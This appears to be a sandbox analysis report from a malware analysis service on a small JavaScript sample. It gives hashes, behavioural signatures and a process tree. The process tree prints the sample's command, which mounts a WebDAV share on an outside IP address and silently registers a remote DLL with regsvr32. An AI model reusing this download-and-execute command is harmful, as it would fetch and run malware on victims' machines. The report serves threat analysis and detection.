Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
140s -
max time network
127s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
22/07/2024, 13:21
Static task
static1
Behavioral task
behavioral1
Sample
728224761729330496.js
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
728224761729330496.js
Resource
win10v2004-20240709-en
General
-
Target
728224761729330496.js
-
Size
4KB
-
MD5
d4aafbd24341a2bc79ec5c81525045cf
-
SHA1
b61aa4dfe590a11c4d4f2f1331c2ed13ff603bf6
-
SHA256
0a68d0456bfac34933119fc7025aecd7dcddb3fc5014b4ea6109bf2f196faf15
-
SHA512
c4e2741bd040d2324c58e9508500c7f2b6202feb2b7b62d9576cf3c1a28546a3318683dd52a9000310fda42aaa0c6ba6b30d0941301a11312ccdf2d6e59ee0b0
-
SSDEEP
96:OV4YwQsPlhqXStvuiX8N2UeAkfgtHUeRuF:yQhqiteN2VAkfgtHVs
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Control Panel\International\Geo\Nation wscript.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 4988 wrote to memory of 3036 4988 wscript.exe 84 PID 4988 wrote to memory of 3036 4988 wscript.exe 84 PID 3036 wrote to memory of 3112 3036 cmd.exe 86 PID 3036 wrote to memory of 3112 3036 cmd.exe 86
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\728224761729330496.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4988 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k net use \\45.9.74.36@8888\davwwwroot\ && regsvr32 /s \\45.9.74.36@8888\davwwwroot\228731522310956.dll2⤵
- Suspicious use of WriteProcessMemory
PID:3036 -
C:\Windows\system32\net.exenet use \\45.9.74.36@8888\davwwwroot\3⤵PID:3112
-
-